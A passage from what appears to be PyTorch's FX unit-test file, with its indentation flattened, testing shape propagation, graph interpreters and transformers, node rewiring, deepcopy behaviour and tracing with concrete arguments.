class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int, ...]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
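# Interpreter executes the GraphModule node by node; running it should match both the
# compiled GraphModule and the original eager module.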
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
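# Override call_function/call_method to swap sigmoid and neg at execution time without
# modifying the underlying graph.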
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
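# Build a call chain deeper than the recursion limit to make sure deepcopy of a Graph does
# not recurse node-by-node.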
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
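# inserting_before(b) positions newly created nodes ahead of `b`, so the relu can be rewired
# to consume the inserted neg.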
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
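# node.users records every consumer of a value; here x feeds the relu, add, and neg nodes.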
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
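# concrete_args burns the value of `y` into the trace; FX is expected to insert a
# torch._assert guard so calling with a different value fails at runtime.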
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
